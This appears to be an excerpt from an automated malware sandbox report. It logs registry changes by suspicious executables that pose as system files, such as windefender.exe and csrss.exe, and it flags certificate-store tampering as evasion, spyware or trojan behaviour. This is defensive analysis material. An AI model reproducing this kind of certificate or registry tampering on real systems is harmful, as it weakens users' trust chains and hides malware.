Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecision = "0" C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\EixwDOh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-5f-6d-7b-5a-38\WpadDecisionTime = 10f2cda7ff06da01 C:\Windows\SysWOW64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

